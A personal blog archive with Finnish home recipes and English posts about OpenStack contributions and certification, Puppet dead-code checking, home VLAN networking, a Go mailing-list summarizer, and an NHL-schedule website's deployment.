Salaatti: pieni tomaattia, salaatti, yksi avokaado, 400g kanaafilee vaan suolattu. Paistaa kanaa viimeistä ja kun se on valmis laitta croutonit uuniin muutama minuuttia.

Tarjota parmeggiano pöydällä.

Tadaa :)

Reseptit: Avokado pasta

Kahdelle

Ohjeet: Hakata yhden keltainen sipuli. Laita kattilaan öljyllä. Miksata turkalainen jogurtti ja kaksi avokadoa. Suolata runsaasti ja vähän mustapippuria. Laitta vesi päällä spaghetille.

Avokado sipulille. Rakastaa puoli parmeggiano levy ja laitta melkein kaikki kattilaan. Ylimäärä pöydälle.

Puristaa puoli sitruuna kattilaan. Kun on lämmin se on valmis. Viimeistä Spaghetti kattilaan. Tsekkaa jos lisää suola ja pippuri on tarvetavissa.

Resepti: ChilliFetaPasta

Kahdelle

Osat:

  • Fetajuustoa levy 200g
  • 180g spaghetti
  • 1 chilli / habanero
  • ~ 350g tomaattia
  • Oliiviöljy
  • Suola ja Pippuri

Ohjeet :

Laitta uunin päällä 250C astetta. Feta levy uuniformille, tomaattia ympäri sen. Hakkaa chilli ja laitta juuston päällä. Paljon öljy yli kaikki. Suolata ja pipurita :) 25min uunissa.

Kun vesi on 100C laitta suola ja sen jälkeen spaghettin.

Kun tomaattia on rikki ota formmi uunista ja miksata feta ja chilli. Laitta kaikki yhdessä.

Bon App!

Reseptit: Tuorepuuro Mustikalla

Ainesosit:

  • Maitorahka (pehmeä) 250g
  • Maito 100g
  • Nesteinen Hunaja 6-10g
  • Pakaste Mustikka 100g
  • Kaurahiutaleita 40g
  • 1 laatikko

Ohjeet:

Laita mustikoita laatikkoon ja odottaa noin tunti. Sen jälkeen laitta kaikki muut ainesosit laatikkoon ja miksata. Huomata että mustikoita eivät menevät liian rikki kuin haluat. Sulje laatiko ja laitta jääkaapiin yli yö.

Nautista aamulla!

Contributing To OpenStack Upstream

Recently I had the pleasure of contributing upstream to the OpenStack project!

A link to my merged patches: https://review.opendev.org/#/q/owner:+guldmyr+status:merged

In a previous OpenStack summit (these days called OpenInfra Summits), (Vancouver 2018) I went there a few days early and attended the Upstream Institute https://docs.openstack.org/upstream-training/ .
It was 1.5 days long or so if I remember right. Looking up my notes from that these were the highlights:

  • Best way to start getting involved is to attend weekly meetings of projects
  • Stickersssss
  • A very similar process to RDO with Gerrit and reviews
  • Underlying tests are all done with ansible and they have ARA enabled so one gets a nice Web UI to view results afterward. Logs are saved as part of the Zuul testing too so one can really dig into and see what is tested and if something breaks when it’s being tested.

Even though my patches were one baby and a bit over 1 year in time after the Upstream Institute I could still figure things out quite quickly with the help of the guides and get bugs created and patches submitted. My general plan when first attending it wasn’t to contribute code changes, but rather to start reading code, perhaps find open bugs and so on.

The thing I wanted to change in puppet-keystone was apparently also possible to change in many other puppet-* modules, and less than a day after my puppet-keystone change got merged into master someone else picked up the torch and made PRs to like ~15 other repositories with similar changes :) Pretty cool!

Testing is hard! https://review.opendev.org/#/c/669045/1 is one backport I created for puppet-keystone/rocky, and the Ubuntu testing was not working initially (started with an APT mirror issue and later it was slow and timed out)… After 20 rechecks and two weeks, it still hadn’t successfully passed a test. In the end we got there though with the help of a core reviewer that actually updated some mirror and later disabled some tests :)

Now the change itself was about “oslo_middleware/max_request_body_size” So that we can increase it from the default 114688. The Pouta Cloud had issues where our Federation User Mappings were larger than 114688 bytes and we coudln’t update them anymore, turns out they were blocked by oslo_middleware.

(does anybody know where 114688bytes comes from? Some internal speculation has been that it is from 128kilobytes minus some headers)

Anyway, the mapping we have now is simplified just a long [ list ] of “local_username”: “federation_email”, domain: “default”. I think next step might be to try to figure out if maybe we can make the rules using something like below instead of hardcoding the values into the rules

"name": "{0}" 

It’s been quite hard to find examples that are exactly like our use-case (and playing about with is not a priority right now, just something in the backlog, but could be interesting to look at when we start accepting more federations).

All in all, I’m really happy to have gotten to contribute something to the OpenStack ecosystem!

Taking puppet-ghostbuster for a spin

We use puppet at $dayjob to configure OpenStack.

I wanted to know if there’s a lot of unused code in our manifests!

**From left of stage enters: https://github.com/camptocamp/puppet-ghostbuster **

Step one is to install the puppet modules and gems and whatnot, this blog post was good about that: https://codingbee.net/puppet/puppet-identifying-dead-puppet-code-using-puppet-ghostbuster

Next I needed to get the HTTP forwarding of the puppetdb working, this can apparently (I learnt about ssh -J) be done with:

ssh -J jumphost.example.org INTERNALIPOFPUPPETMASTER -L 8081:localhost:8080

Then for setting some variables pointing to hiera.yaml and setting

PUPPETDB_URL=http://localhost:8081
HIERA_YAML=/tmp/hiera.yaml

Unsure if hiera.yaml works, just copied it in from the puppetmaster

Then running it

find . -type f -name ‘*.pp’ -exec puppet-lint –only-checks ghostbuster_classes,ghostbuster_defines,ghostbuster_facts,ghostbuster_files,ghostbuster_functions,ghostbuster_hiera_files,ghostbuster_templates,ghostbuster_types {} \+|grep OURMODULE

Got some output! Are they correct?

./modules/OURMODULE/manifests/profile/apache.pp – WARNING: Class OURMODULE::Profile::Apache seems unused on line 6

But actually we have a role that contains:

class { ‘OURMODULE::profile::apache’: }

So I’m not sure what is up… But if I don’t run all the ghostbuster and instead skip the ghostbuster_classes test I get a lot fewer warnings for our module.

/modules/OURMODULE/manifests/profile/keystone/user.pp – WARNING: Define OURMODULE::Profile::Keystone::User seems unused on line 2

Looking in that one we have a “OURMODULE::profile::keystone::user” which calls keystone_user and keystone_user_role. However we do call it but like this:

OURMODULE::Profile::Keystone::User<| title == ‘barbican’ |>

Or in this other place:

create_resources(OURMODULE::profile::keystone::user, $users)

Let’s look at the next. which was also a “create_resources” . Meh. Same same. And if I skip the ghostbuster_defines? No errors :) Well it was worth a shot. Some googling on the topic hints that it might not be possible with the way puppet works.

Home Network Convergence

Finally got around to sorting out an issue which basically was that the TV+Chromecast near the TV was on another network than the media server and thus I couldn’t stream videos by using my phone.

I’ve been thinking lately and in previous posts that maybe I should just get an access point and plug it in a port in the correct VLAN near the TV, as mentioned in a previous posts in https://www.guldmyr.com/blog/vlan-in-the-home-network/ or https://www.guldmyr.com/blog/some-updates-to-the-home-network/

But then the other day I started looking at maybe the raspberry Pi I have as a media player could be turned into an access point? (some googling suggest it could be done, but several talk about basic linux install with hostapd and dnsmasq which maybe openwrt would be more fun).

Then I realized that I already have an access point over there which is what phones and the chromecast is connected to and I don’t want a third wifi network at home!

Finally the solution is to get the media server onto the same network as the chromecast. This I could now after the VLAN changes do quite easily.

Steps:
– take the desktop’s cable and put it in a dumb 1GbE switch I had unused
– new cable from my desktop’s system board NIC to go same a switch
– at this point ssh into media server from internet (because it has no monitor/keyboard)
– add usb NIC to the media server and connect to the switch
– setup static NIC without default gw etc
– update firewalls

Things learnt:
– the USB NIC got a funny and long interface name when I plugged it in. On next reboot it got eth0. So the network interface config I wrote initially didn’t really work anymore :)

Feels good to not have to this this old and unmaintained media player on the raspberry pi anymore. The android app I use even supports EAC3!

Next I’m wondering what to do with that raspberry pi! retropie maybe?

VLAN in the home network!

Above is a previous post in this series about some improvements to my home network. With two modems from two ISPs.

So! On Alibaba I found two Hasivo 8x1GbE managed fanless switches with VLAN support. Delivery time to Finland was really quick. It didn’t say (ok, I didn’t read all or ask seller) if they included European adapters but turns out they did!

To recap: The idea was to use the one long cable and transport two VLANs over it. Other than that how I would actually implement it was a bit fuzzy.

New layout. Numbers in the switchlike boxes are VLAN ids

Things I’ve learnt while connecting these:

  • Creating a VLAN subinterface in Windows 10 seems to require Hyper-V.. This means if I have one machine and want it in both VLANs I need two NICs. No bother, I found a USB3 1GbE adapter in a box at home when cleaning :)
  • I knew about VLAN trunk cables, and the way they are implemented in this Web Interface is to set both VLANs as tagged on the same port.
    • The web interface of this switch has two pages about VLANs. One is a static setup where you say which port is a member of which VLAN and if it’s tagged or untagged. Changing the default or removing a port from VLAN 1 was not possible in this the first screen. In the second however one can change the PVID which is the untagged/native VLAN.
  • Also found a few extra short ethernet cables in old ISP modem boxes, very nice to have with this as this exercise required a few more cables.
  • So on the desktop I now need to choose which network interface to use to get to the Internet. I learnt that if I just remove default gateway for IPv4 from ISP A and use the NIC to ISP B then IPv6 from ISP A will still be there and used :)
First VLAN config page: The static VLAN/tagged VLAN setup on the other page
Second VLAN config page: The native VLAN / PVID configuration on one switch

Some more bits about the switches is in order:

On a related note, the modems have switches builtin and I also had a 6 port fanless unmanaged switch which has been working great for the last 6 years or so but now that got deprecated, yay one less UK plug adapter :). I prefer using an extra switch as opposed to the modem’s. The modems sometimes reboot which is annoying as it interrupts anything I’m doing, even if it’s only local without going to the Internet.

They have a very basic looking CGI web interface. The web interface is only accessible on VLAN 1. The firmware is from 2013 and has version v1.0.3, I asked the seller (which was very responsive to all of my questions) and apparently a newer one is in the works but unfortunately, there’s no way to subscribe to any news about new firmware coming.. I doubt it’ll ever come.

One switch-like quality was that to save the running configuration you make in the web interface, you have to click on save.

There is a manual, one just had to ask the seller on Ali Baba for it – attaching it here for convenience.

All in all this worked out quite nicely. We’ll see how this keeps up. Some further avenues of interest:

  • On my desktop I now use the USB NIC to get to the internet, I tried once to use the system board NIC but then had some issues.. perhaps that’s a bit faster. Using a USB 3 port vs a USB 2 port gave about half a millisecond faster latency to this place I usually ping.funet.fi
  • Response time on the DSL is a bit higher (17 vs 12) to ping.funet.fi
    • tracert shows 17ms to first hop with the DSL’s ISP
    • tracepath shows 10ms to first hop with the cable modem’s ISP
    • pinging the DSL modem is 1ms vs cable modem 3ms
    • ping6 to ping.funet.fi is 10ms with DSL
  • Maybe time to look into a cheap AP to plug in near ISP modem B but connected to VLAN 10 so wifi clients there can reach the server..
  • The switches have a bunch of other settings that could be fun to play with too.

Was the layout diagram above not clear? Try this:

Some updates to the home network 1/2

Current layout:

  • The corner:
    • Cable MODEM NAT&WiFi ISP A
    • One server
    • One desktop who should be on both networks, default gw on one
    • Phones and tablets wifi
  • TV Area:
    • DSL Modem NAT&WiFi ISP B
    • One raspberry pi connected to the server
    • Phones and tablets wifi
    • One chromecast, would be nice to have connected to the server too
    • One ps3
  • 20m, a microwave, and walls in between the two areas (and most importantly the server and the raspberry pi) so wifi is spotty.

Most import factor: One long ass 30m UTP cable connecting the raspberry pi to the same network as the server

It would be cool to: A) be able to connect the desktop to the modem out by the TV and B) Get the chromecast (WIFI only) onto the same network as the server, perhaps with an AP for ISP A network near the TV area

Stay tuned for another post in the hopefully near future when I’ve got something working to help with A/B :)

Update : another graphical representation of the netwirjs:

A story about writing my first golang script and how to make a mailman archive summarizer

Time to try out another programming language!

Golang I see quite frequently in my twitters so have been thinking for a while – why not give it a shot for the next project!

TLDR; https://github.com/martbhell/mailman-summarizer


Took a while to figure out what would be a nice small project. Usually my projects involve some kind of web scraping that helps me somehow, https://wtangy.se/ is one which tells me if there “Was An Nhl Game Yesterday”. Also in this case it turned out I wanted something similar, but this time it was work related. I have been tinkering with this for a week or so on and off. Today, the day after Finnish Independence day I thought let’s get this going!

For $dayjob I’m in a team that among many other things manage a CEPH rados gateway object storage service. CEPH is quite a big (OK, it’s quite an active) project and their mailing lists are a decent (OK, I don’t know a better) places to stay up to date. For example the http://lists.ceph.com/pipermail/ceph-users-ceph.com/ has lots of interesting threads. However it sometimes gets 1000 messages per month! This is way too many for me, especially since most of them are not that interesting to me as I’m not an admin of any CEPH clusters, our services only use them :)

So the idea of an aggregator or filter was born. The mailing list has a digest option when subscribing, but it doesn’t have a filter.

Enter “mailman-summarizer“! https://github.com/martbhell/mailman-summarizer

As usual when I play around in my spare time I try to document much more than is necessary. But if I ever need to re-read this code in a year or two because something broke then I want to save myself some time. Most likely I won’t be writing much more Go between now and then so the things I learnt while writing this piece will probably have been purged from memory!

The end result https://storage.googleapis.com/ceph-rgw-users/feed.xml
as of right now looks like below in one RSS reader:

In summary the steps to get there were:

  • Used https://github.com/bcongdon/colly-example to do some web scraping of the mailman/pipermail web archive of the ceph-users e-mail list. Golang here was quite different from Python and beautifulsoup. It uses callbacks. I didn’t look too deeply into those but things did not happen in the same order they were written. Maybe it can be used to speed things up a bit, but the slowest part of this scraping is the 1s+random time delay I have between the HTTP GETs to be nice to the Internet ;)
  • It loops over the Months (thread.html) for some of the years and only saves links and their titles which has “GW” in the title.
  • Put this in a map (golang is different here too. Kind of like a python dictionary but one had to initialize it in advance. Lots of googling involved :)
  • Loop over the map and create RSS, JSON, ATOM or HTML output using the gorilla feeds pkg. Use of the time pkg in Golang was needed to have nice fields in the RSS, this was interesting. Not using UNIX 1970 seconds epoch but some date in 2006? Some|most functions?types?interfaces? (I don’t know the names of most things) give a value AND an error on the call makes declaring? a variable a bit funny looking:
for l, _ := range data {
    keys = append(keys, l)
}

 That was the golang part. I could have just taken the output, stored it in a file and put it in a web server somewhere.

https://wtangy.se uses google’s object store, but it has an appengine python app in front. So I took a break and watched some NHL from yesterday and in the breaks I thought about what would be a slim way of publishing this feed. I did not want to run a virtual machine or container constantly, the feed is a static HTML and can just be put in an object store somewhere. It would need a place to run the code though, to actually generate the RSS feed!

I’m a big fan of travis-ci and as part of this project the continuous integration does this on every commit:

  • spawn a virtual machine with Go configured (this is all part of travis(/any other CI system I’ve played with), just needs the right words in .travis.yml file in the repo)
  • decrypt a file that has the credentials of a service account which has access to a bucket or two in a project in google cloud
  • compiles mailman-summarizer
  • run a bash script which eventually publishes the RSS feed on a website. It does this to a staging object storage bucket:
    • go runs “mailman-summarizer -rss” and writes the output to a file called feed.xml
    • uses the credentials to write feed.xml to the bucket and make the object public-readable
    • Then the script does the same to the production bucket

One could improve the CI part here a few ways:

  • Right now it uses the travis script provider in the deploy phase. There is a ‘gcs’ provider, but I couldn’t find documentation for how to specify the JSON file with the credentials like with appengine. I get a feel that because it’s not easy I should probably use appengine instead..
  • One could do more validation, perhaps validate the RSS feed before actually uploading it. But I couldn’t find a nice program that would validate the feed. There are websites like https://validator.w3.org/feed/ though so I used that manually. Maybe RSS feeds aren’t so cool anymore , I use them a lot though. 
  • An e2e test would also be cool. For example fetch the feed.xml from the staging and make sure it is the same as what was uploaded. 

Certified OpenStack administrator – check!

Yay! Took the exam last week after having studied a few days. Nothing seemed to be impossible from the list of requirements at least :)

Thought because it’s done online it can be scheduled almost on demand, but one had to wait at least 24h for the exam environment to get provisioned.

The online proctor part was a first for me. For sure it’ll help if you have a non cheap webcam (with a longer wire) that can be moved around.

The results arrived after only a day, 96% so I missed something small somewhere. Maybe about swift if I have to guess :)

I always liked these practical exams. One really need some experience with what is being tested. I don’t thinn it is possible to just study. Fortunately it’s easy to install a lab environment! 

Playing with devstack while studying for OpenStack Certified Administrator

Below I’ll go through some topics I thought about while reading through the requirements for COA:

  • Users and passwords because we use a LDAP at $dayjob. How to set passwords and stuff?
    • openstack user password set
    • openstack role add –user foo member –project demo
  • Users and quota. Can one set openstack to have user quota? 
    • guess not :)
  • How to default quota with CLI?
    • nova quota-class commands. Found in operator’s guide in the docs.
  • Create openrc without horizon
    • TIL that OS_AUTH in devstack is http://IP/identity . No separate port :) And couldn’t really find a nice way. After it’s working there’s an $ openstack configuration show though which tells stuff..
  • Cinder backup
    • cool, but this service is not there by default in devstack.
  • Cinder encryption 
    • another volume type with encryption.  Shouldn’t need barbican with a fixed_key but I don’t know, cinder in my devstack wasn’t really working so couldn’t attach and try it out. Have some volumes with a encryption_key_id of “000000…” so maybe? Attaching my LVMs isn’t working for some reason. Complaining about initiator ?
  • Cinder groups.
    • Details found under cinder admin guide under rocky.. not Pike. Using cinder command one can create volume group types and then volume groups and then volumes in the volume group. All with cinder command. After you have added volumes into a group you can take snapshots of a volume group. And also create a volume group (and volumes) from the list of snapshots.
  • Cinder storage pool
    • backends. In devstack it’s devstack@lvmdriver-1apparently one can set volume_backend_name both as a cinder.conf and as a property
  • Object Expiration. Supported in CEPH rados gateway? Yes, but in luminous
    • available in default devstack, done with a magical header X-Delete-After:epoch
  • Make a Heat template from scratch using the docs. 
    • can be made quite minimal
  • Update a stack
  • Checking status of all the services
  • Forget about ctrl+w.

Study Environment

A devstack setup in an Ubuntu 18.04 in a VM in $dayjob cloud. This means no nested virtualization and I wonder how unhappy neutron will be because port security. But it’s all within one VM – it started OK, not everything worked but that’s fine with me :) Probably just need a local.conf which is not the default!

One thing I got to figure out was the LVM setup for cinder. Always fun to read logs :)

Studying for Openstack Certified Administrator

The plan : study a bit and then attempt the coa exam. If I don’t pass then attend the course during openstack summit: SUSE

And what to study? I’ve been doing openstack admin work for the last year or two. So I have already done and used most services, except Swift. But there are some things that were only done once when each environment was setup. Also at $dayjob our code does a lot for us.

One such thing I noticed while looking through https://github.com/AJNOURI/COA/wiki/02.-Compute:-Nova

Was setting the default project quota. I wonder if that’s a cli/webui/API call or service config. But a config file would be weird, unless it’s in Keystone. Turns out default quotas are in each of the services’ config files. It’s also possible to set a default quota with for example the nova command.

Another perhaps useful thing I did was to go through the release notes for the services. $dayjob run Newton so I started with the release after that and tried to grok and look for biggest changes. Introduction of placement was one of them and I got an introduction to that while playing with devstack and “failed to create resource provider devstack” error. After looking through logs I saw a “409 conflict” HTTP error or placement was complaining that the resource already existed. So somehow during setup it was created but in the wrong way? I deleted it and restarted nova and it got created automatically and after that nova started acting a lot better :)

wtangy.se – now with user preferences!

As part of my learning some more about modern web developments I’ve learnt that cookies now suck and one should use some kind of local storage in the web browser. One of them is Web Storage .

https://wtangy.se/ got some more updates over the weekend :)

Now if you choose a team in the /menu and later (from the same browser) visits https://wtangy.se/ you’ll get the results for that team. The selection can be cleared in bottom of the menu.

wtangy.se – site rename and automatic deployments!

This is a good one!

Previous entries in this series: http://www.guldmyr.com/blog/wasthereannhlgamelastnight-com-now-using-object-storage/ and  http://www.guldmyr.com/blog/wasthereannhlgamelastnight-appspot-com-fixed-working-again/

Renamed to wtangy.se

First things first! The website has been renamed to wtangy.se! Nobody in their right mind would type out wasthereannhlgamelastnight.com.. so now it’s an acronym of wasthereannhlgameyesterday. wtangy.se . Using Sweden .se top level domain because there was an offer making it really cheap :)

 

Automatic testing and deployment

Second important update is that now we do some automatic testing and deployment.

This is done with travis-ci.org where one can view builds, the configuration is done in this file.

In google cloud there’s different versions of the apps deployed. If we don’t promote a version it will not be accessible from wtangy.se (or wasthereannhlgamelastnight.appspot.com) but via some other URL.

Right now the testing happens like this on every commit:

  1. deploy the code to a testing version (which we don’t promote)
  2. then we run some scripts:
    1. pylint on the python scripts
    2. an end to end test which tries to visit the website.
  3. if the above succeeds we do deploy to master (which we do promote)
wasthereannhlgamelastnight.com

wasthereannhlgamelastnight.com – now using object storage!

To continue this series of blog posts about the awesome https://wasthereannhlgamelastnight.appspot.com/WINGS web site where you can see if there was in fact, an NHL game last night :)

Some background: First I had a python script that scraped the website of nhl.com and later changed that to just grab the data from the JSON REST API of nhl.com – much nicer. But it was still outputing the result to stdout as a set and a dictionary. And then I would in the application import this file to get the schedule. This was quite hacky and ugly :) But hey it worked.

As of this commit it now uses Google’s Cloud Object Storage:

  • a special URL (one has to be an admin to be able to access it)
  • there’s a cronjob which calls this URL once a day (22:00 in some time zone)
  • when this URL is called a python script runs which:
    • checks what year it is and composes the URL to the API so that we only grab this season’s games (to be a bit nicer to the API)
    • does some sanity checking – that the fetched data is not empty
    • extracts the dates and teams as before and writes two variables,
      • one list which has the dates when there’s a game
      • one dictionary which has the dates and all the games on each date
        • probably the last would be enough ;)
    • finally always overwrites the schedule

 

To only update it when there are changes would be cool as then I could notify myself (and possibly others) when there have been changes, but it would mean that the JSON dict has to be ordered, which they aren’t by default so I’d have to change some stuff. The GCSFileStat has a checksum-like metadata of the files called ETAG. But probably it would be best to first compute a checksum of the generated JSON and then add that as an extra metadata to the object as this ETAG is probably implemented differently between providers.

 

wasthereannhlgamelastnight.appspot.com – fixed – working again!